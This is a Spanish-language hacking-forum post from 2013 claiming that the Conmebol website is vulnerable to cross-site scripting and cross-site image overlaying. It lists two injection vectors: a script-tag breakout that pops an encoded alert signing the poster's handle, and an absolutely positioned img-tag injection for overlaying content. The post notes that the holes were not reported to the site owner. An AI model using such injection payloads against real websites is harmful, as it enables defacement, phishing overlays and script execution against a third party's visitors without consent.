[XSS] & [XSIO] Conmebol

Hu0r · Febrero 19, 2013, 04:27:00 PM

Pude percatarme que la página web de la Conmebol es vulnerable a XSS y a XSIO (y de seguro a un montón de otras):

XSS

Url: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: "/><script>alert(String.fromCharCode(104,117,048,114,032,085,110,100,101,114,099,048,100,101))</script>

XSIO

Url: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vector: "><img src='No tienes permitido ver los links. Registrarse o Entrar a mi cuenta' style='position:absolute;left:50px;top:0px;'/>

------------------

Reportado: NO

[XSS] & [XSIO] Conmebol

Hu0r

Febrero 19, 2013, 04:27:00 PM Ultima modificación: Enero 10, 2015, 12:59:19 PM por Expermicid